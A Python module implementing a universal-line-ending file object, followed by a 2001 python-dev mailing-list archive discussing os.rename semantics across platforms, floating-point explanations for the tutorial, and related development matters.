It would usually be used as:

from TextFile import open

then you can use the new open just like the old one (with some added flags and arguments)

or

import TextFile

file = TextFile.open(filename,flags,[bufsize], [LineEndingType], [LineBufferSize])


"""
import os

## Re-map the open function
_OrigOpen = open

def open(filename,flags = "r",bufsize = -1, LineEndingType = "native", LineBufferSize = ""):
    """
    
    A new open function, that returns a regular python file object for
    the old calls, and returns a new nifty universal text file when
    required.

    This works just like the regular open command, except that a new
    flag and two new parameters have been added.

    Call:

    file = open(filename, flags = "r", bufsize = -1, LineEndingType = "native", LineBufferSize = "")
    - filename is the name of the file to be opened
    - flags is a string of one letter flags, the same as the standard open
      command, plus a "t" for universal text file.
    - - "b" means binary file, this returns the standard binary file object
    - - "t" means universal text file
    - - "r" for read only
    - - "w" for write. If both "w" and "t" are given, then the user can
        specify a line ending type to be used with the LineEndingType
        parameter.
    - - "a" means append to existing file

    - bufsize specifies the buffer size to be used by the system. Same
      as the regular open function

    - LineEndingType is used only for writing (and appending) files, to specify a
      non-native line ending to be written.
    - - The options are: "native", "DOS", "Posix", "Unix", "Mac", or the
        characters themselves ("\r\n", etc.). "native" will result in
        using the standard file object, which uses whatever is native
        for the system that python is running on.

    - LineBufferSize is the size of the buffer used to read data in
    a readline() operation. The default is currently set to 100
    characters. Longer lines are still read correctly, but need extra
    reads; if you will be reading files with many lines over 100
    characters long, set this number to the largest expected line
    length.

    
    """

    if "t" in flags: # this is a universal text file
        if ("w" in flags or "a" in flags) and LineEndingType.lower() == "native":
            return _OrigOpen(filename,flags.replace("t",""), bufsize)
        return UniversalTextFile(filename,flags,LineEndingType,LineBufferSize)
    else: # this is a regular old file
        return _OrigOpen(filename,flags,bufsize)
    
    
class UniversalTextFile:
    """
    
    A class that acts just like a python file object, but has a mode
    that allows the reading of arbitrarily formatted text files, i.e. with
    either Unix, DOS or Mac line endings. [\n , \r\n, or \r]

    To keep it truly universal, it checks for each of these line ending
    possibilities at every line, so it should work on a file with mixed
    endings as well.

    """
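    def __init__(self,filename,flags = "r",LineEndingType = "native",LineBufferSize = ""):
        mode = flags.replace("t","")
        if not ("r" in mode or "w" in mode or "a" in mode):
            mode = "r" + mode # a bare "t" means read, as with the builtin open
        self._file = _OrigOpen(filename,mode+"b")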

        LineEndingType = LineEndingType.lower()
        if LineEndingType == "native":
            self.LineSep = os.linesep
        elif LineEndingType == "dos":
            self.LineSep = "\r\n"
        elif LineEndingType == "posix" or LineEndingType == "unix" :
            self.LineSep = "\n"
        elif LineEndingType == "mac":
            self.LineSep = "\r"
        else:
            self.LineSep = LineEndingType
        
        ## some attributes
        self.closed = 0
        self.mode = flags
        self.softspace = 0
        if LineBufferSize:
            self._BufferSize = LineBufferSize
        else:
            self._BufferSize = 100

    def readline(self):
        start_pos = self._file.tell()
        ##print "Current file position is:", start_pos
        line = ""
        TotalBytes = 0
        Buffer = self._file.read(self._BufferSize)
        while Buffer:
            ##print "Buffer = ",repr(Buffer)
            newline_pos = Buffer.find("\n")
            return_pos  = Buffer.find("\r")
            if return_pos == newline_pos-1 and return_pos >= 0: # we have a DOS line
                line = Buffer[:return_pos]+ "\n"
                TotalBytes = newline_pos+1
                break
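            elif ((return_pos < newline_pos) or newline_pos < 0 ) and return_pos >=0: # we have a Mac line
                if return_pos == len(Buffer)-1:
                    # a trailing "\r" may be the first half of a DOS "\r\n"
                    # split across two reads: read more before deciding
                    NewBuffer = self._file.read(self._BufferSize)
                    if NewBuffer:
                        Buffer = Buffer + NewBuffer
                        continue
                line = Buffer[:return_pos]+ "\n"
                TotalBytes = return_pos+1
                break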
            elif newline_pos >= 0: # we have a Posix line
                line = Buffer[:newline_pos]+ "\n"
                TotalBytes = newline_pos+1
                break
            else: # we need a larger buffer
                NewBuffer = self._file.read(self._BufferSize)
                if NewBuffer:
                    Buffer = Buffer + NewBuffer
                else: # we are at the end of the file, without a line ending.
                    self._file.seek(start_pos + len(Buffer))
                    return Buffer

        self._file.seek(start_pos + TotalBytes)
        return line

    def readlines(self,sizehint = None):
        """

        readlines acts like the regular readlines, except that it
        understands any of the standard text file line endings ("\r\n",
        "\n", "\r").

        If sizehint is used, it will read a maximum of that many
        bytes. It will not round up, as the regular readlines does. This
        means that if sizehint is less than the length of the
        next line, you won't get anything.

        """
        
        if sizehint:
            Data = self._file.read(sizehint)
        else:
            Data = self._file.read()

        if len(Data) == sizehint:
            #print "The buffer is full"
            FullBuffer = 1
        else:
            FullBuffer = 0
        Data = Data.replace("\r\n","\n").replace("\r","\n")
        Lines = [line + "\n" for line in Data.split('\n')]
        #print Lines
        ## If the last line is only a linefeed it is an extra line
        if Lines[-1] == "\n":
            del Lines[-1]
        ## if it isn't then the last line didn't have a linefeed, so we need to remove the one we put on.
        else:
            ## or it's the end of the buffer
            if FullBuffer:
                #print "the file is at:",self._file.tell()
                #print "the last line has length:",len(Lines[-1])
                self._file.seek(-(len(Lines[-1])-1),1) # reset the file position
                del(Lines[-1])
            else:
                Lines[-1] = Lines[-1][:-1]
        return Lines

    def readnumlines(self,NumLines = 1):
        """

        readnumlines is an extension to the standard file object. It
        returns a list containing the number of lines that are
        requested. I have found this to be very useful, and allows me to avoid the many loops like:

        lines = []
        for i in range(N):
            lines.append(file.readline())

        Also, If I ever get around to writing this in C, it will provide a speed improvement.

        """
        Lines = []
        while len(Lines) < NumLines:
            Lines.append(self.readline())
        return Lines

    def read(self,size = None):
        """
     
        read acts like the regular read, except that it translates any of
        the standard text file line endings ("\r\n", "\n", "\r") into a
        "\n"
        
        If size is used, it will read a maximum of that many bytes,
        before translation. This means that if the line endings have
        more than one character, the size returned will be smaller. This
        could be patched, but it didn't seem worth it. If you want that
        much control, use a binary file.
      
        """
        
        if size:
            Data = self._file.read(size)
        else:
            Data = self._file.read()
            
        return Data.replace("\r\n","\n").replace("\r","\n")
    
    def write(self,string):
        """

        write is just like the regular one, except that it uses the line
          separator specified when the file was opened for writing or
          appending.


        """
        self._file.write(string.replace("\n",self.LineSep))

    def writelines(self,list):
        for line in list:
            self.write(line)
        

    # The rest of the standard file methods mapped
    def close(self):
        self._file.close()
        self.closed = 1
    def flush(self):
        self._file.flush()
    def fileno(self):
        return self._file.fileno()
    def seek(self,offset,whence = 0):
        self._file.seek(offset,whence)
    def tell(self):
        return self._file.tell()
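The core of what UniversalTextFile.read() and readlines() do is the pair of chained replace() calls, and it can be shown on its own. The following is a minimal standalone sketch in modern Python. The function names are hypothetical and are not part of the attached module. The order of the two replacements matters: replacing "\r" first would turn every DOS ending into two newlines.

```python
def normalize_newlines(data):
    r"""Translate DOS ("\r\n") and Mac ("\r") line endings to "\n".

    "\r\n" must be replaced first; otherwise each DOS ending would
    become two newlines.
    """
    return data.replace("\r\n", "\n").replace("\r", "\n")


def split_universal_lines(data):
    r"""Split text with any mix of line endings into lines that each end
    in "\n", except possibly the last one (mirroring readlines())."""
    lines = [line + "\n" for line in normalize_newlines(data).split("\n")]
    if lines[-1] == "\n":
        # data ended with a line ending (or was empty): drop the extra entry
        del lines[-1]
    else:
        # the last line had no line ending: remove the one added above
        lines[-1] = lines[-1][:-1]
    return lines


print(split_universal_lines("dos\r\nmac\runix\nlast"))
# ['dos\n', 'mac\n', 'unix\n', 'last']
```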
    

From guido at digicool.com  Wed May 23 01:46:53 2001
From: guido at digicool.com (Guido van Rossum)
Date: Tue, 22 May 2001 19:46:53 -0400
Subject: [Python-Dev] unifying os.rename semantics across platform
In-Reply-To: Your message of "Tue, 22 May 2001 16:54:42 CDT."
             <15114.57378.887742.531145@beluga.mojam.com> 
References: <15114.57378.887742.531145@beluga.mojam.com> 
Message-ID: <200105222346.f4MNkr104833@odiug.digicool.com>

> It was brought to my attention a week ago by a client that os.rename
> semantics differ between Unix and Windows.  On Unix, if the destination file
> already exists it is silently deleted.  On Windows, an exception is raised.
> I was able to verify this for Python 2.0 on Windows98.  I assume nothing
> changed for 2.1, but I can't verify that.

I've always known this, and assumed it was common knowledge.
Sorry. ;-)

> (Windows trashed my partition
> table and my Linux root partition while I was downloading 2.1.
> Consequently, I no longer run Windows.  Take that, Bill...)  I haven't
> checked the Mac yet (will do that when I get back to the US), but I think
> that os.rename should have the same semantics across all platforms.  To the
> extent reasonably possible, I think this should also be true of other common
> functions exposed through the os module.
> 
> On the (unsupportable) theory that to-date, more Python apps have been
> written and/or deployed on Unix-like systems and that where Windows apps are
> concerned, many developers will have added a thin wrapper to mimic the Unix
> semantics, I think less breakage would result if the Unix semantics were
> implemented in the Windows version.  It appears that is what POSIX
> compliance would demand as well.
> 
> Skip

I certainly wouldn't want to try to emulate the Windows semantics on
Unix.  However, I think that emulating the correct Posix semantics on
Windows is not possible either.  The Posix rename() call guarantees
that it is atomic: there is no point in time where the file doesn't
exist at all (and a system or program crash can't delete the file).  I
wouldn't know how to do that in Windows -- the straightforward version

    if os.path.exists(target):
        os.unlink(target)
    os.rename(source, target)

leaves a vulnerability open where the target doesn't exist and if at
that point the system crashes or the program is killed, you lose the
target.

I would prefer to document the difference so applications can decide
how to deal with this.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido at digicool.com  Wed May 23 01:50:29 2001
From: guido at digicool.com (Guido van Rossum)
Date: Tue, 22 May 2001 19:50:29 -0400
Subject: [Python-Dev] FP vs. tutorial
In-Reply-To: Your message of "Tue, 22 May 2001 14:44:09 PDT."
             <Pine.LNX.4.21.0105221432100.21762-100000@localhost.localdomain> 
References: <Pine.LNX.4.21.0105221432100.21762-100000@localhost.localdomain> 
Message-ID: <200105222350.f4MNoUj04853@odiug.digicool.com>

> Who was it that said every equation will halve your audience?

Einstein.

> I agree with that, the tutorial should try to be as broad and simple
> as possible.

But keep in mind that the particular Python tutorial we're talking
about is intended for an audience of folks who already know how to
program.  I vote against dumbing this down.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From michel at digicool.com  Wed May 23 02:17:59 2001
From: michel at digicool.com (Michel Pelletier)
Date: Tue, 22 May 2001 17:17:59 -0700 (PDT)
Subject: [Python-Dev] FP vs. tutorial
In-Reply-To: <200105222350.f4MNoUj04853@odiug.digicool.com>
Message-ID: <Pine.LNX.4.21.0105221712250.22109-100000@localhost.localdomain>

On Tue, 22 May 2001, Guido van Rossum wrote:

> > I agree with that, the tutorial should try to be as broad and simple
> > as possible.
> 
> But keep in mind that the particular Python tutorial we're talking
> about is intended for an audience of folks who already know how to
> program.  I vote against dumbing this down.

Now that I've actually read the tutorial (wink) I see the true target
audience.  For some reason, I thought it was oriented more toward the CP4E
audience.

Is there a python "children's book" complete with big red dogs and rabbits
in waistcoats?  That would be an interesting project...

-Michel


From guido at digicool.com  Wed May 23 02:20:25 2001
From: guido at digicool.com (Guido van Rossum)
Date: Tue, 22 May 2001 20:20:25 -0400
Subject: [Python-Dev] FP vs. tutorial
In-Reply-To: Your message of "Tue, 22 May 2001 17:17:59 PDT."
             <Pine.LNX.4.21.0105221712250.22109-100000@localhost.localdomain> 
References: <Pine.LNX.4.21.0105221712250.22109-100000@localhost.localdomain> 
Message-ID: <200105230020.f4N0KPU05103@odiug.digicool.com>

> Is there a python "children's book" complete with big red dogs and rabbits
> in waistcoats?  That would be an interesting project...

See http://www.python.org/sigs/edu-sig/ and
http://www.python.org/doc/Intros.html (the latter has a section with
intros for non-programmers).

--Guido van Rossum (home page: http://www.python.org/~guido/)


From tim.one at home.com  Wed May 23 02:23:42 2001
From: tim.one at home.com (Tim Peters)
Date: Tue, 22 May 2001 20:23:42 -0400
Subject: [Python-Dev] FP vs. tutorial
In-Reply-To: <Pine.LNX.4.21.0105221432100.21762-100000@localhost.localdomain>
Message-ID: <LNBBLJKPBEHFEDALKOLCEEOCKDAA.tim.one@home.com>

I struggled with a way to do a better job of explaining this stuff last
night.  As I see others already said, the Tutorial is not aimed at script
kiddies, or non-programmers, or even programming newbies, but at programmers
who are simply new to Python.  So everything I put in the tutorial was either
jarringly out of place, or inadequate to address the audience you (Michel)
have in mind.  But I agree that's an important audience, and I spend a fair
chunk of my life now anyway explaining this stuff over & over to those who
think computing a ratio of two integers is akin to solving fourth order
differential equations <wink>.

In the end I decided to write a Tutorial Appendix in a much gentler style.
It doesn't really fit with the rest of the Tutorial, but then that's *why*
it's an Appendix.  The patch is here:

    http://sourceforge.net/tracker/index.php?func=detail&aid=426208&group_id=5470&atid=305470

I also changed the tutorial fp examples so they have an excellent chance of
displaying the same strings across all platforms, and even if Python 10K
defaults to decimal floating-point someday (perhaps in the year 10000, as its
name suggests).


From gward at python.net  Wed May 23 02:33:11 2001
From: gward at python.net (Greg Ward)
Date: Tue, 22 May 2001 20:33:11 -0400
Subject: [Python-Dev] unifying os.rename semantics across platform
In-Reply-To: <200105222346.f4MNkr104833@odiug.digicool.com>; from guido@digicool.com on Tue, May 22, 2001 at 07:46:53PM -0400
References: <15114.57378.887742.531145@beluga.mojam.com> <200105222346.f4MNkr104833@odiug.digicool.com>
Message-ID: <20010522203311.E1245@gerg.ca>

On 22 May 2001, Guido van Rossum said:
> I would prefer to document the difference so applications can decide
> how to deal with this.

I agree -- it has always seemed to me that the standard library merely
exposes the underlying OS functionality for you.  This puts portability
somewhat in the hands of the application writer -- with power comes
responsibility.  I think that's the way it should be; any attempt to
convert OS A to the semantics of OS B will fall down somewhere.  Witness
the loss-of-atomicity in Guido's example.  I'm sure any other semantic
difference between OSes would have similar "gotchas" if we attempted to
paper over them.

        Greg
-- 
Greg Ward - just another Python hacker                  gward at python.net
http://starship.python.net/~gward/
Beware of altruism.  It is based on self-deception, the root of all evil.


From tim.one at home.com  Wed May 23 08:31:29 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 23 May 2001 02:31:29 -0400
Subject: [Python-Dev] FP vs. tutorial
In-Reply-To: <20010522094157.A1245@gerg.ca>
Message-ID: <LNBBLJKPBEHFEDALKOLCGEONKDAA.tim.one@home.com>

[Greg Ward, on http://www.lahey.com/float.htm]

> I found this article more useful, interesting, and informative than
> whatever I learned about binary floating-point in my academic years.
> Good link, Tim.  Two catches:
>
>   * I can just barely follow the FORTRAN examples; I very much doubt
>     the average Python newbie would have any more luck than me

The goal is to frighten them:  the ones with the right stuff to use fp
without destroying a satellite, bringing down the Internet, designing a
pacemaker that fails when rounding a corner clockwise at 1.37g, causing a
small country's economy to collapse, making jet fighters spontaneously turn
upside down when crossing the equator, or triggering WW III by accident, will
persist <wink>.  BTW, not all of those were made up!

>   * I tried several of the FORTRAN examples in Python, and did not
>     witness any of the gotchas they are meant to illustrate.  Possibly
>     it's just single-precision vs. double-precision difference, but
>     Python 2.1 under Linux 2.2 on an Athlon compiled with gcc 2.95.2
>     doesn't demonstrate the same gotchas as that article does.

You can't illustrate the last half of their examples in Python without
playing obscure games with the struct module, because they rely on the
existence of more than one size of floating-point type.
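The following is a minimal sketch of the kind of struct game meant here. It assumes Python 3 and IEEE 754 floats. Packing a float with the "<f" format and unpacking it again rounds the value to single precision, which makes a second floating-point size visible from Python. The helper name is hypothetical.

```python
import struct


def to_single(x):
    """Round a Python float (a C double) to the nearest IEEE 754
    single-precision value by packing it into 4 bytes and unpacking it."""
    return struct.unpack("<f", struct.pack("<f", x))[0]


single_tenth = to_single(0.1)
print(repr(single_tenth))     # 0.10000000149011612
print(single_tenth == 0.1)    # False: the single and double roundings differ
print(to_single(0.5) == 0.5)  # True: 0.5 is exact at both sizes
```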

Your lack of luck with the first half of their examples is indeed solely due
to the fact that he used single-precision examples and Python's float is
double.  You need to find different numbers to show the same things in
Python; like so:

# Binary Floating Point
x = 100000000000. * 0.00000000001
if x != 1.0:
    print "Oops!  It's %r" % x

# Inexactness
a = 98. / 49.
reciprocal = 1./49.
b = 98. * reciprocal
if a != b:
    print "Oops!  They're %r and %r" % (a, b)

# Crazy Conversions
x = 32.05
y = x * 100. # "looks like" 3205. if display rounded
i = int(y)   # actually truncates to 3204
print y, i, repr(y)

It's Real Work coming up with stuff like that.  What I'm hearing is that
people won't understand it anyway -- so screw it.  If they want an education,
they can prove it by doing a google search <0.6 wink>.


From tim.one at home.com  Wed May 23 08:44:14 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 23 May 2001 02:44:14 -0400
Subject: [Python-Dev] unifying os.rename semantics across platform
In-Reply-To: <200105222346.f4MNkr104833@odiug.digicool.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCCEOOKDAA.tim.one@home.com>

[Guido]
> ...
> I certainly wouldn't want to try to emulate the Windows semantics on
> Unix.  However, I think that emulating the correct Posix semantics on
> Windows is not possible either.

Neither is it desirable:  Windows isn't POSIX, and Windows users would be
appalled if os.rename() could silently destroy files.  If such a function
needs to exist, create a new cowboy_unix_tricks module instead <wink>.

This has never been a problem for me because I always check to see whether
the target file exists before using os.rename(), and do something else if it
does.  I understand that's vulnerable to races, but nobody asked whether I
cared about that <wink>.
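The check-first approach can be written as a small wrapper. The following is a minimal sketch that assumes Python 3. The name rename_no_clobber is hypothetical and is not a standard function. As noted above, the wrapper is still vulnerable to races.

```python
import errno
import os


def rename_no_clobber(src, dst):
    """Rename src to dst, but refuse to overwrite an existing dst,
    giving Windows-like semantics on any platform.

    This is check-then-act and therefore racy: another process can
    create dst between the exists() test and the rename(), and on a
    POSIX system rename() would then still silently replace it.
    """
    if os.path.exists(dst):
        raise OSError(errno.EEXIST, "destination already exists", dst)
    os.rename(src, dst)
```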

> The Posix rename() call guarantees that it is atomic: there is no
> point in time where the file doesn't exist at all (and a system or
> program crash can't delete the file).  I wouldn't know how to do
> that in Windows -- the straightforward version
>
>     if os.path.exists(target):
>         os.unlink(target)
>     os.rename(source, target)
>
> leaves a vulnerability open where the target doesn't exist and if at
> that point the system crashes or the program is killed, you lose the
> target.

More obviously, it also fails if target simply exists and is open (you can't
unlink an open file on Windows).

Nevertheless, you can do this renaming safely on Windows, via doing the right
system magic to make rename happen at reboot time before Windows actually
starts.  But I'm not sure Skip's client would want to reboot each time Python
did a file rename <wink>.

> I would prefer to document the difference so applications can decide
> how to deal with this.

Yup!


From MarkH at ActiveState.com  Wed May 23 10:55:17 2001
From: MarkH at ActiveState.com (Mark Hammond)
Date: Wed, 23 May 2001 18:55:17 +1000
Subject: [Python-Dev] FP vs. tutorial
In-Reply-To: <LNBBLJKPBEHFEDALKOLCGEONKDAA.tim.one@home.com>
Message-ID: <LCEPIIGDJPKCOIHOBJEPIELMDNAA.MarkH@ActiveState.com>

[Tim on a subject near and dear to his testicles]

> It's Real Work coming up with stuff like that.  What I'm hearing is that
> people won't understand it anyway -- so screw it.  If they want
> an education,
> they can prove it by doing a google search <0.6 wink>.

I am inclined to agree.

IMO, The Python tutorial or other documentation should include a basic
example of these "errors", and a link to _either_ of the HTML pages
referenced in this thread as an optional extra.

Just enough to stop _most_ of the "this is a bug" posts - but stopping well
short of any attempt to "educate" them in floating point madness.  Just
_one_ example of floats not being exact would suffice.
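A single example of the kind Mark suggests might look like this. The specific numbers are an illustrative choice and do not come from this thread.

```python
# Neither 0.1, 0.2 nor 0.3 is exactly representable in binary, and the
# rounding errors in the sum do not cancel out.
total = 0.1 + 0.2
print(total == 0.3)  # False
print(repr(total))   # 0.30000000000000004
```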

Going from my personal experience, I learnt long ago that floating point is
not exact.  That is all I needed to know to move on.  I didn't like it, and
I didn't understand exactly why (I thought I did, but Tim put a stop to that
misconception <wink>), but I could move on once I had that skerrick of
enlightenment.  And believe it or not, some of my code _does_ use floats,
and _does_ work! (well, works as well as the rest of my code anyway <wink>)

And-it-wasn't-even-Python-that-taught-me,

Mark.


From pf at artcom-gmbh.de  Wed May 23 09:49:13 2001
From: pf at artcom-gmbh.de (Peter Funk)
Date: Wed, 23 May 2001 09:49:13 +0200 (MEST)
Subject: [Python-Dev] unifying os.rename semantics across platform
In-Reply-To: <15114.57947.313813.522806@cj42289-a.reston1.va.home.com> from "Fred
 L. Drake, Jr." at "May 22, 2001 06:04:11 pm"
Message-ID: <m152TOL-000CpwC@artcom0.artcom-gmbh.de>

Hi,

Fred L. Drake, Jr. schrieb:
> skip at pobox.com writes:
>  > On the (unsupportable) theory that to-date, more Python apps have been
>  > written and/or deployed on Unix-like systems and that where Windows apps are
>  > concerned, many developers will have added a thin wrapper to mimic the Unix
>  > semantics, I think less breakage would result if the Unix semantics were
> 
>   I don't know whether there are more deployed Python apps on Unix
> than on Windows (and I've no good idea about how to find out), but I
> think unifying the semantics one way or the other is a good thing.
> Regardless of which set of semantics is chosen.

I agree.  May I suggest to add an optional third boolean parameter to 
os.rename called 'replace', which defaults either to TRUE or FALSE, so 
modifying existing apps  will become even less hassle to potential porters.  
Here is a strawman to explain what I mean:
--------------------------------------
import os

def new_rename(src, dst, replace=0, old_rename=os.rename):
    if os.path.exists(dst):
        if replace:
            if not os.path.isdir(dst):
                os.remove(dst)
            else:
                # I'm not sure what to do here.  recursive removal?  dangerous!
                raise NotImplementedError
        else:
            raise OSError("%s already exists" % dst)
    return old_rename(src, dst)

os.rename = new_rename
--------------------------------------

Regards, Peter
-- 
Peter Funk, Oldenburger Str.86, D-27777 Ganderkesee, Germany, Fax:+49 4222950260
office: +49 421 20419-0 (ArtCom GmbH, Grazer Str.8, D-28359 Bremen, Germany)


From jack at oratrix.nl  Wed May 23 13:15:10 2001
From: jack at oratrix.nl (Jack Jansen)
Date: Wed, 23 May 2001 13:15:10 +0200
Subject: [Python-Dev] Assertion failed in dictobject.c
Message-ID: <20010523111510.D504D3B8999@snelboot.oratrix.nl>

I'm seeing the assert on line 525 in dictobject.c (revision 2.92) failing. The 
debugger tells me that ma_fill and ma_size are both 8. ma_used is 2, and 
interestingly hash is also 8.

Going back to revision 2.90 fixes the problem (or masks it).
--
Jack Jansen             | ++++ stop the execution of Mumia Abu-Jamal ++++
Jack.Jansen at oratrix.com | ++++ if you agree copy these lines to your sig ++++
www.oratrix.nl/~jack    | ++++ see http://www.xs4all.nl/~tank/ ++++


From skip at pobox.com  Wed May 23 13:59:45 2001
From: skip at pobox.com (skip at pobox.com)
Date: Wed, 23 May 2001 06:59:45 -0500
Subject: [Python-Dev] unifying os.rename semantics across platform
In-Reply-To: <LNBBLJKPBEHFEDALKOLCCEOOKDAA.tim.one@home.com>
References: <200105222346.f4MNkr104833@odiug.digicool.com>
	<LNBBLJKPBEHFEDALKOLCCEOOKDAA.tim.one@home.com>
Message-ID: <15115.42545.172775.716565@beluga.mojam.com>

>>>>> "Tim" == Tim Peters <tim.one at home.com> writes:

    Tim> [Guido]
    >> I would prefer to document the difference so applications can decide
    >> how to deal with this.

    Tim> Yup!

Submitted as patch #426598, assigned to Dr. Doc (aka Fred).

Skip


From skip at pobox.com  Wed May 23 14:11:51 2001
From: skip at pobox.com (skip at pobox.com)
Date: Wed, 23 May 2001 07:11:51 -0500
Subject: [Python-Dev] unifying os.rename semantics across platform
In-Reply-To: <m152TOL-000CpwC@artcom0.artcom-gmbh.de>
References: <15114.57947.313813.522806@cj42289-a.reston1.va.home.com>
	<m152TOL-000CpwC@artcom0.artcom-gmbh.de>
Message-ID: <15115.43271.480135.227059@beluga.mojam.com>

    Peter> I agree.  May I suggest adding an optional third boolean
    Peter> parameter to os.rename called 'replace', which defaults to either
    Peter> TRUE or FALSE, so that modifying existing apps will be even less
    Peter> hassle for potential porters.

In his response to my post, Guido indicated there is a race condition.
Between the time you delete the preexisting destination file and do the
actual file rename, Windows could wink out on you, leaving you with the
original src file and no original dst file.  POSIX semantics require the
rename to be atomic, and a delete-then-rename sequence on Windows just can't
provide that.

Fred, perhaps my doc mod should be enhanced to identify the race condition
for people who need to use os.rename on Windows and will be forced to first
unlink the destination file.
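A minimal sketch of the workaround under discussion, assuming a platform whose os.rename refuses to overwrite an existing file. Moving dst aside first, rather than deleting it, does not make the operation atomic; it only means that a crash between the two renames leaves the old contents recoverable under a backup name. The helper name replace_file and the ".bak" suffix are hypothetical.

```python
import os

def replace_file(src, dst, backup_suffix=".bak"):
    """Rename src to dst, replacing any existing dst.

    NOT atomic: if the process dies between the two renames, dst is
    missing, but its old contents survive as dst + backup_suffix.
    """
    if not os.path.exists(dst):
        os.rename(src, dst)
        return
    backup = dst + backup_suffix          # hypothetical naming scheme
    if os.path.exists(backup):
        os.remove(backup)                 # discard a stale backup
    os.rename(dst, backup)                # step 1: move the old file aside
    try:
        os.rename(src, dst)               # step 2: the race window is between 1 and 2
    except OSError:
        os.rename(backup, dst)            # put the original back on failure
        raise
    os.remove(backup)                     # step 3: clean up
```

The restore-on-failure branch is the main design choice: if src cannot be moved into place, the caller still ends up with the original dst rather than nothing.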

Skip


From guido at digicool.com  Wed May 23 15:19:24 2001
From: guido at digicool.com (Guido van Rossum)
Date: Wed, 23 May 2001 09:19:24 -0400
Subject: [Python-Dev] FP vs. tutorial
In-Reply-To: Your message of "Wed, 23 May 2001 02:31:29 EDT."
             <LNBBLJKPBEHFEDALKOLCGEONKDAA.tim.one@home.com> 
References: <LNBBLJKPBEHFEDALKOLCGEONKDAA.tim.one@home.com> 
Message-ID: <200105231319.f4NDJOs06485@odiug.digicool.com>

I liked the text that Tim posted to SF, but I would like it even
better if it also *contained* the text from the "PresentationError"
moinmoin wiki page, rather than referring to it by URL.  The moinmoin
URL is not a good long-term name for that information -- printed
copies of the tutorial will persist long after the moinmoin wiki has
been moved or consolidated.  Plus, instead of referring people to the
moinmoin wiki page, I'd like to be able to refer them to the appendix
of the tutorial!

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido at digicool.com  Wed May 23 15:32:17 2001
From: guido at digicool.com (Guido van Rossum)
Date: Wed, 23 May 2001 09:32:17 -0400
Subject: [Python-Dev] FP vs. tutorial
In-Reply-To: Your message of "Wed, 23 May 2001 18:55:17 +1000."
             <LCEPIIGDJPKCOIHOBJEPIELMDNAA.MarkH@ActiveState.com> 
References: <LCEPIIGDJPKCOIHOBJEPIELMDNAA.MarkH@ActiveState.com> 
Message-ID: <200105231332.f4NDWH706564@odiug.digicool.com>

[Mark]
> IMO, The Python tutorial or other documentation should include a basic
> example of these "errors", and a link to _either_ of the HTML pages
> referenced in this thread as an optional extra.
> 
> Just enough to stop _most_ of the "this is a bug" posts - but
> stopping well short of any attempt to "educate" them in floating
> point madness.  Just _one_ example of floats not being exact would
> suffice.

I agree: we don't have to explain *why* it happens.  We just have to
explain *that* it happens, so folks don't think they've discovered
a bug in Python.

Or maybe we could do this: in the main text, explain and show *that*
it happens, and refer to the appendix which can explain *why* it
happens to those interested, in a gentle manner like what Tim already
wrote.
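Along the lines Mark and Guido suggest, a single short example is enough to show *that* it happens. The exact digits printed depend on the Python version's float repr; the values in the comments are what recent versions show.

```python
# 0.1, 0.2 and 0.3 cannot be stored exactly in binary floating point,
# so their tiny representation errors become visible when combined.
total = 0.1 + 0.2
print(total == 0.3)              # False
print(repr(total))               # 0.30000000000000004 on recent versions

# Comparing with a tolerance avoids the surprise.
print(abs(total - 0.3) < 1e-9)   # True
```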

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido at digicool.com  Wed May 23 15:52:02 2001
From: guido at digicool.com (Guido van Rossum)
Date: Wed, 23 May 2001 09:52:02 -0400
Subject: [Python-Dev] unifying os.rename semantics across platform
In-Reply-To: Your message of "Wed, 23 May 2001 09:49:13 +0200."
             <m152TOL-000CpwC@artcom0.artcom-gmbh.de> 
References: <m152TOL-000CpwC@artcom0.artcom-gmbh.de> 
Message-ID: <200105231352.f4NDq3g06738@odiug.digicool.com>

> May I suggest adding an optional third boolean parameter to
> os.rename called 'replace', which defaults to either TRUE or FALSE,
> so that modifying existing apps will be even less hassle for potential
> porters.

I see no reason to change the API.

In any case, for backwards compatibility, the default would have to be
platform dependent, which strikes me as just as bad as the current
situation.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From thomas at xs4all.net  Wed May 23 16:00:25 2001
From: thomas at xs4all.net (Thomas Wouters)
Date: Wed, 23 May 2001 16:00:25 +0200
Subject: [Python-Dev] Python 2.1.1
Message-ID: <20010523160025.B690@xs4all.nl>

As those of you on python-checkins might have noticed ;) I started checking
in Python 2.1.1 bugfixes. I'd hoped to finish all of my backlog today, but
unfortunately I'm now called away on a surprise emergency meeting, so I'm not
sure if I'll make it. The 2.1.1 tree is in a somewhat unstable state right now;
I'll fix that today in any case, but after the meeting.

(As for why I started doing it: I just spent about two weeks of digging
through Pine source code, and its imap server in particular, and I decided I
deserved a break -- Python reads like a Heinlein novel, after pine code:
readable, straight-forward, and just enough complexity to keep it
entertaining :)

-- 
Thomas Wouters <thomas at xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From aahz at rahul.net  Wed May 23 16:08:45 2001
From: aahz at rahul.net (Aahz Maruch)
Date: Wed, 23 May 2001 07:08:45 -0700 (PDT)
Subject: [Python-Dev] Killing threads
Message-ID: <20010523140845.B092299C83@waltz.rahul.net>

Okay, so we all know it isn't possible to kill threads cleanly and
safely in any kind of cross-platform way.  At the same time, a program
that has a thread running haywire should be able to kill itself
completely, so that a monitoring process can restart it.  How hard would
it be to do only that in a cross-platform way?

I'm guessing that for Unix, we'd just send a hard signal (9 or 15).  No
clue what would need to happen for Windows and Mac.

(This got brought up because I experimented with os._exit() as a
possible solution, but that GPFs on Win98SE.)
-- 
                      --- Aahz (@pobox.com)

Hugs and backrubs -- I break Rule 6       <*>       http://www.rahul.net/aahz/
Androgynous poly kinky vanilla queer het Pythonista

I don't really mind a person having the last whine, but I do mind
someone else having the last self-righteous whine.


From thomas.heller at ion-tof.com  Wed May 23 19:28:07 2001
From: thomas.heller at ion-tof.com (Thomas Heller)
Date: Wed, 23 May 2001 19:28:07 +0200
Subject: [Python-Dev] New metaclass pattern (Was Re: Simulating Class (was Re: Does Python have Class methods))
References: <OF92F5AE57.7BB01157-ON88256A50.00672E1C@i2.com>
Message-ID: <020301c0e3ad$bb559790$e000a8c0@thomasnotebook>

[this message has also been posted to comp.lang.python]
